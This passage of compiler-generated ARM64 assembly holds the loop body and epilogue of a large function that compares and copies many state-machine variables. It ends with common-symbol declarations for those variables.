ldr x8, [sp, #904] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_642
b LBB1_641
LBB1_641: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #48] ; 8-byte Folded Reload
ldr x8, [sp, #584] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
subs w8, w8, #1
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_642
LBB1_642: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #360] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_645
b LBB1_643
LBB1_643: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #904] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_645
b LBB1_644
LBB1_644: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #584] ; 8-byte Folded Reload
ldr x8, [sp, #592] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_645
LBB1_645: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #360] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_649
b LBB1_646
LBB1_646: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_649
b LBB1_647
LBB1_647: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_649
b LBB1_648
LBB1_648: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #904] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_649
LBB1_649: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #360] ; 8-byte Folded Reload
ldr x8, [sp, #904] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_654
b LBB1_650
LBB1_650: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_653
b LBB1_651
LBB1_651: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_653
b LBB1_652
LBB1_652: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #904] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_654
b LBB1_653
LBB1_653: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #20
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_654
LBB1_654: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_657
b LBB1_655
LBB1_655: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #20
cset w8, ne
tbnz w8, #0, LBB1_657
b LBB1_656
LBB1_656: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #360] ; 8-byte Folded Reload
ldr x8, [sp, #904] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_657
LBB1_657: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
adds w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB1_661
b LBB1_658
LBB1_658: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #360] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_661
b LBB1_659
LBB1_659: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #20
cset w8, ne
tbnz w8, #0, LBB1_661
b LBB1_660
LBB1_660: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #904] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_661
LBB1_661: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #568] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_663
b LBB1_662
LBB1_662: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #576] ; 8-byte Folded Reload
ldr x8, [sp, #40] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB1_665
b LBB1_663
LBB1_663: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #400] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_665
b LBB1_664
LBB1_664: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #944] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #16] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_692
b LBB1_665
LBB1_665: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #400] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_667
b LBB1_666
LBB1_666: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #944] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_668
b LBB1_667
LBB1_667: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #40] ; 8-byte Folded Reload
ldr x8, [sp, #576] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ne
mov w9, #0
str w9, [sp, #16] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_692
b LBB1_668
LBB1_668: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #944] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_670
b LBB1_669
LBB1_669: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #32] ; 8-byte Folded Reload
ldr x8, [sp, #568] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
subs w8, w8, #1
cset w8, ne
mov w9, #0
str w9, [sp, #16] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_692
b LBB1_670
LBB1_670: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #400] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_673
b LBB1_671
LBB1_671: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #944] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_673
b LBB1_672
LBB1_672: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #568] ; 8-byte Folded Reload
ldr x8, [sp, #576] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
mov w9, #0
str w9, [sp, #16] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_692
b LBB1_673
LBB1_673: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #400] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_677
b LBB1_674
LBB1_674: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_677
b LBB1_675
LBB1_675: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_677
b LBB1_676
LBB1_676: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #944] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #16] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_692
b LBB1_677
LBB1_677: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #400] ; 8-byte Folded Reload
ldr x8, [sp, #944] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_682
b LBB1_678
LBB1_678: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_681
b LBB1_679
LBB1_679: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_681
b LBB1_680
LBB1_680: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #944] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_682
b LBB1_681
LBB1_681: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #21
cset w8, ne
mov w9, #0
str w9, [sp, #16] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_692
b LBB1_682
LBB1_682: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_685
b LBB1_683
LBB1_683: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #21
cset w8, ne
tbnz w8, #0, LBB1_685
b LBB1_684
LBB1_684: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #400] ; 8-byte Folded Reload
ldr x8, [sp, #944] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
mov w9, #0
str w9, [sp, #16] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_692
b LBB1_685
LBB1_685: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
adds w8, w8, #1
cset w8, eq
mov w9, #1
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_691
b LBB1_686
LBB1_686: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #400] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
str w9, [sp, #8] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_690
b LBB1_687
LBB1_687: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #21
cset w8, ne
mov w9, #0
str w9, [sp, #4] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_689
b LBB1_688
LBB1_688: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #944] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
str w8, [sp, #4] ; 4-byte Folded Spill
b LBB1_689
LBB1_689: ; in Loop: Header=BB1_70 Depth=1
ldr w8, [sp, #4] ; 4-byte Folded Reload
str w8, [sp, #8] ; 4-byte Folded Spill
b LBB1_690
LBB1_690: ; in Loop: Header=BB1_70 Depth=1
ldr w8, [sp, #8] ; 4-byte Folded Reload
eor w8, w8, #0x1
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB1_691
LBB1_691: ; in Loop: Header=BB1_70 Depth=1
ldr w8, [sp, #12] ; 4-byte Folded Reload
str w8, [sp, #16] ; 4-byte Folded Spill
b LBB1_692
LBB1_692: ; in Loop: Header=BB1_70 Depth=1
ldr w8, [sp, #16] ; 4-byte Folded Reload
str w8, [sp, #20] ; 4-byte Folded Spill
b LBB1_693
LBB1_693: ; in Loop: Header=BB1_70 Depth=1
ldur x11, [x29, #-128] ; 8-byte Folded Reload
ldr x10, [sp, #552] ; 8-byte Folded Reload
ldur x13, [x29, #-136] ; 8-byte Folded Reload
ldr x12, [sp, #544] ; 8-byte Folded Reload
ldur x15, [x29, #-144] ; 8-byte Folded Reload
ldr x14, [sp, #536] ; 8-byte Folded Reload
ldur x17, [x29, #-152] ; 8-byte Folded Reload
ldr x16, [sp, #528] ; 8-byte Folded Reload
ldur x1, [x29, #-160] ; 8-byte Folded Reload
ldr x0, [sp, #520] ; 8-byte Folded Reload
ldur x3, [x29, #-112] ; 8-byte Folded Reload
ldr x2, [sp, #512] ; 8-byte Folded Reload
ldur x5, [x29, #-168] ; 8-byte Folded Reload
ldr x4, [sp, #504] ; 8-byte Folded Reload
ldur x7, [x29, #-176] ; 8-byte Folded Reload
ldr x6, [sp, #496] ; 8-byte Folded Reload
ldur x20, [x29, #-184] ; 8-byte Folded Reload
ldr x19, [sp, #488] ; 8-byte Folded Reload
ldur x22, [x29, #-192] ; 8-byte Folded Reload
ldr x21, [sp, #480] ; 8-byte Folded Reload
ldur x24, [x29, #-200] ; 8-byte Folded Reload
ldr x23, [sp, #472] ; 8-byte Folded Reload
ldur x26, [x29, #-208] ; 8-byte Folded Reload
ldr x25, [sp, #464] ; 8-byte Folded Reload
ldur x28, [x29, #-216] ; 8-byte Folded Reload
ldr x27, [sp, #456] ; 8-byte Folded Reload
ldr x30, [sp, #448] ; 8-byte Folded Reload
ldr x9, [sp, #568] ; 8-byte Folded Reload
ldr w8, [sp, #20] ; 4-byte Folded Reload
and w8, w8, #0x1
stur w8, [x29, #-96]
ldr x8, [sp, #32] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #576] ; 8-byte Folded Reload
ldr x8, [sp, #40] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #584] ; 8-byte Folded Reload
ldr x8, [sp, #48] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #592] ; 8-byte Folded Reload
ldr x8, [sp, #56] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #600] ; 8-byte Folded Reload
ldr x8, [sp, #64] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #608] ; 8-byte Folded Reload
ldr x8, [sp, #72] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #616] ; 8-byte Folded Reload
ldr x8, [sp, #80] ; 8-byte Folded Reload
ldrb w8, [x8]
strb w8, [x9]
ldr x9, [sp, #624] ; 8-byte Folded Reload
ldr x8, [sp, #88] ; 8-byte Folded Reload
ldrb w8, [x8]
strb w8, [x9]
ldr x9, [sp, #632] ; 8-byte Folded Reload
ldr x8, [sp, #96] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #640] ; 8-byte Folded Reload
ldr x8, [sp, #104] ; 8-byte Folded Reload
ldrb w8, [x8]
strb w8, [x9]
ldr x9, [sp, #648] ; 8-byte Folded Reload
ldr x8, [sp, #112] ; 8-byte Folded Reload
ldrb w8, [x8]
strb w8, [x9]
ldr x9, [sp, #656] ; 8-byte Folded Reload
ldr x8, [sp, #120] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #664] ; 8-byte Folded Reload
ldr x8, [sp, #128] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #672] ; 8-byte Folded Reload
ldr x8, [sp, #136] ; 8-byte Folded Reload
ldrb w8, [x8]
strb w8, [x9]
ldr x9, [sp, #680] ; 8-byte Folded Reload
adrp x8, __x_run@GOTPAGE
ldr x8, [x8, __x_run@GOTPAGEOFF]
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #688] ; 8-byte Folded Reload
ldr x8, [sp, #144] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #696] ; 8-byte Folded Reload
ldr x8, [sp, #152] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #704] ; 8-byte Folded Reload
ldr x8, [sp, #160] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #712] ; 8-byte Folded Reload
ldr x8, [sp, #168] ; 8-byte Folded Reload
ldrb w8, [x8]
strb w8, [x9]
ldr x9, [sp, #720] ; 8-byte Folded Reload
ldr x8, [sp, #176] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #728] ; 8-byte Folded Reload
ldr x8, [sp, #184] ; 8-byte Folded Reload
ldrb w8, [x8]
strb w8, [x9]
ldr x9, [sp, #736] ; 8-byte Folded Reload
ldr x8, [sp, #192] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #744] ; 8-byte Folded Reload
ldr x8, [sp, #200] ; 8-byte Folded Reload
ldrb w8, [x8]
strb w8, [x9]
ldr x9, [sp, #752] ; 8-byte Folded Reload
ldr x8, [sp, #208] ; 8-byte Folded Reload
ldrb w8, [x8]
strb w8, [x9]
ldr x9, [sp, #760] ; 8-byte Folded Reload
ldr x8, [sp, #216] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #768] ; 8-byte Folded Reload
ldr x8, [sp, #224] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #776] ; 8-byte Folded Reload
ldr x8, [sp, #232] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #784] ; 8-byte Folded Reload
ldr x8, [sp, #240] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #792] ; 8-byte Folded Reload
ldr x8, [sp, #248] ; 8-byte Folded Reload
ldrb w8, [x8]
strb w8, [x9]
ldr x9, [sp, #800] ; 8-byte Folded Reload
ldr x8, [sp, #256] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #808] ; 8-byte Folded Reload
ldr x8, [sp, #264] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #816] ; 8-byte Folded Reload
ldr x8, [sp, #272] ; 8-byte Folded Reload
ldrb w8, [x8]
strb w8, [x9]
ldr x9, [sp, #824] ; 8-byte Folded Reload
ldr x8, [sp, #280] ; 8-byte Folded Reload
ldrb w8, [x8]
strb w8, [x9]
ldr x9, [sp, #832] ; 8-byte Folded Reload
ldr x8, [sp, #288] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #840] ; 8-byte Folded Reload
ldr x8, [sp, #296] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #848] ; 8-byte Folded Reload
ldr x8, [sp, #304] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #856] ; 8-byte Folded Reload
ldr x8, [sp, #312] ; 8-byte Folded Reload
ldrb w8, [x8]
strb w8, [x9]
ldr x9, [sp, #864] ; 8-byte Folded Reload
ldr x8, [sp, #320] ; 8-byte Folded Reload
ldrb w8, [x8]
strb w8, [x9]
ldr x9, [sp, #872] ; 8-byte Folded Reload
ldr x8, [sp, #328] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #880] ; 8-byte Folded Reload
ldr x8, [sp, #336] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #888] ; 8-byte Folded Reload
ldr x8, [sp, #344] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #896] ; 8-byte Folded Reload
ldr x8, [sp, #352] ; 8-byte Folded Reload
ldrb w8, [x8]
strb w8, [x9]
ldr x9, [sp, #904] ; 8-byte Folded Reload
ldr x8, [sp, #360] ; 8-byte Folded Reload
ldrb w8, [x8]
strb w8, [x9]
ldr x9, [sp, #912] ; 8-byte Folded Reload
ldr x8, [sp, #368] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #920] ; 8-byte Folded Reload
ldr x8, [sp, #376] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #928] ; 8-byte Folded Reload
ldr x8, [sp, #384] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldr x9, [sp, #936] ; 8-byte Folded Reload
ldr x8, [sp, #392] ; 8-byte Folded Reload
ldrb w8, [x8]
strb w8, [x9]
ldr x9, [sp, #944] ; 8-byte Folded Reload
ldr x8, [sp, #400] ; 8-byte Folded Reload
ldrb w8, [x8]
strb w8, [x9]
ldr x9, [sp, #952] ; 8-byte Folded Reload
ldr x8, [sp, #408] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldur x9, [x29, #-256] ; 8-byte Folded Reload
ldr x8, [sp, #416] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldur x9, [x29, #-248] ; 8-byte Folded Reload
ldr x8, [sp, #424] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldur x9, [x29, #-240] ; 8-byte Folded Reload
ldr x8, [sp, #432] ; 8-byte Folded Reload
ldrb w8, [x8]
strb w8, [x9]
ldur x9, [x29, #-232] ; 8-byte Folded Reload
ldr x8, [sp, #440] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [x9]
ldur x9, [x29, #-120] ; 8-byte Folded Reload
ldur x8, [x29, #-224] ; 8-byte Folded Reload
ldr w30, [x30]
str w30, [x8]
ldr x8, [sp, #560] ; 8-byte Folded Reload
ldr w27, [x27]
str w27, [x28]
ldrb w25, [x25]
strb w25, [x26]
ldr w23, [x23]
str w23, [x24]
ldr w21, [x21]
str w21, [x22]
ldr w19, [x19]
str w19, [x20]
ldrb w6, [x6]
strb w6, [x7]
ldr w4, [x4]
str w4, [x5]
ldr w2, [x2]
str w2, [x3]
ldr w0, [x0]
str w0, [x1]
ldr w16, [x16]
str w16, [x17]
ldrb w14, [x14]
strb w14, [x15]
ldr w12, [x12]
str w12, [x13]
ldr w10, [x10]
str w10, [x11]
ldr w8, [x8]
str w8, [x9]
b LBB1_70
LBB1_694:
ldur w0, [x29, #-92]
add sp, sp, #1136
ldp x29, x30, [sp, #80] ; 16-byte Folded Reload
ldp x20, x19, [sp, #64] ; 16-byte Folded Reload
ldp x22, x21, [sp, #48] ; 16-byte Folded Reload
ldp x24, x23, [sp, #32] ; 16-byte Folded Reload
ldp x26, x25, [sp, #16] ; 16-byte Folded Reload
ldp x28, x27, [sp], #96 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.comm _sm21_l,4,2 ; @sm21_l
.comm _sm21_loop_len,4,2 ; @sm21_loop_len
.comm _sm20_l,4,2 ; @sm20_l
.comm _sm20_loop_len,4,2 ; @sm20_loop_len
.comm _sm19_l,4,2 ; @sm19_l
.comm _sm19_loop_len,4,2 ; @sm19_loop_len
.comm _sm7_state,1,0 ; @sm7_state
.comm _sm6_state,1,0 ; @sm6_state
.comm _sm8_l,4,2 ; @sm8_l
.comm _sm4_state,1,0 ; @sm4_state
.comm _sm3_state,1,0 ; @sm3_state
.comm _sm6_l,4,2 ; @sm6_l
.comm _sm7_l,4,2 ; @sm7_l
.comm _sm5_state,1,0 ; @sm5_state
.comm _run,4,2 ; @run
.comm _sm2_l,4,2 ; @sm2_l
.comm _sm0_loop_len,4,2 ; @sm0_loop_len
.comm _sm0_l,4,2 ; @sm0_l
.comm _sm8_state,1,0 ; @sm8_state
.comm _sm1_loop_len,4,2 ; @sm1_loop_len
.comm _sm2_state,1,0 ; @sm2_state
.comm _sm3_l,4,2 ; @sm3_l
.comm _sm0_state,1,0 ; @sm0_state
.comm _sm1_state,1,0 ; @sm1_state
.comm _sm1_l,4,2 ; @sm1_l
.comm _sm5_l,4,2 ; @sm5_l
.comm _sm4_l,4,2 ; @sm4_l
.comm _sm2_loop_len,4,2 ; @sm2_loop_len
.comm _sm9_state,1,0 ; @sm9_state
.comm _sm9_l,4,2 ; @sm9_l
.comm _sm3_loop_len,4,2 ; @sm3_loop_len
.comm _sm10_state,1,0 ; @sm10_state
.comm _sm18_state,1,0 ; @sm18_state
.comm _sm11_loop_len,4,2 ; @sm11_loop_len
.comm _sm10_l,4,2 ; @sm10_l
.comm _sm4_loop_len,4,2 ; @sm4_loop_len
.comm _sm11_state,1,0 ; @sm11_state
.comm _sm19_state,1,0 ; @sm19_state
.comm _sm12_loop_len,4,2 ; @sm12_loop_len
.comm _sm11_l,4,2 ; @sm11_l
.comm _sm5_loop_len,4,2 ; @sm5_loop_len
.comm _sm12_state,1,0 ; @sm12_state
.comm _sm20_state,1,0 ; @sm20_state
.comm _sm13_loop_len,4,2 ; @sm13_loop_len
.comm _sm12_l,4,2 ; @sm12_l
.comm _sm6_loop_len,4,2 ; @sm6_loop_len
.comm _sm13_state,1,0 ; @sm13_state
.comm _sm21_state,1,0 ; @sm21_state
.comm _sm14_loop_len,4,2 ; @sm14_loop_len
.comm _sm13_l,4,2 ; @sm13_l
.comm _sm7_loop_len,4,2 ; @sm7_loop_len
.comm _sm14_state,1,0 ; @sm14_state
.comm _sm15_loop_len,4,2 ; @sm15_loop_len
.comm _sm14_l,4,2 ; @sm14_l
.comm _sm8_loop_len,4,2 ; @sm8_loop_len
.comm _sm15_state,1,0 ; @sm15_state
.comm _sm16_loop_len,4,2 ; @sm16_loop_len
.comm _sm15_l,4,2 ; @sm15_l
.comm _sm9_loop_len,4,2 ; @sm9_loop_len
.comm _sm16_state,1,0 ; @sm16_state
.comm _sm17_loop_len,4,2 ; @sm17_loop_len
.comm _semaphore,4,2 ; @semaphore
.comm _sm16_l,4,2 ; @sm16_l
.comm _sm10_loop_len,4,2 ; @sm10_loop_len
.comm _sm17_state,1,0 ; @sm17_state
.comm _sm18_loop_len,4,2 ; @sm18_loop_len
.comm _sm17_l,4,2 ; @sm17_l
.comm _sm18_l,4,2 ; @sm18_l
.comm __x_sm21_l,4,2 ; @_x_sm21_l
.comm __x_sm21_loop_len,4,2 ; @_x_sm21_loop_len
.comm __x_sm20_l,4,2 ; @_x_sm20_l
.comm __x_sm20_loop_len,4,2 ; @_x_sm20_loop_len
.comm __x_sm19_l,4,2 ; @_x_sm19_l
.comm __x_sm19_loop_len,4,2 ; @_x_sm19_loop_len
.comm __x_sm7_state,1,0 ; @_x_sm7_state
.comm __x_sm6_state,1,0 ; @_x_sm6_state
.comm __x_sm8_l,4,2 ; @_x_sm8_l
.comm __x_sm4_state,1,0 ; @_x_sm4_state
.comm __x_sm3_state,1,0 ; @_x_sm3_state
.comm __x_sm6_l,4,2 ; @_x_sm6_l
.comm __x_sm7_l,4,2 ; @_x_sm7_l
.comm __x_sm5_state,1,0 ; @_x_sm5_state
.comm __x_run,4,2 ; @_x_run
.comm __x_sm2_l,4,2 ; @_x_sm2_l
.comm __x_sm0_loop_len,4,2 ; @_x_sm0_loop_len
.comm __x_sm0_l,4,2 ; @_x_sm0_l
.comm __x_sm8_state,1,0 ; @_x_sm8_state
.comm __x_sm1_loop_len,4,2 ; @_x_sm1_loop_len
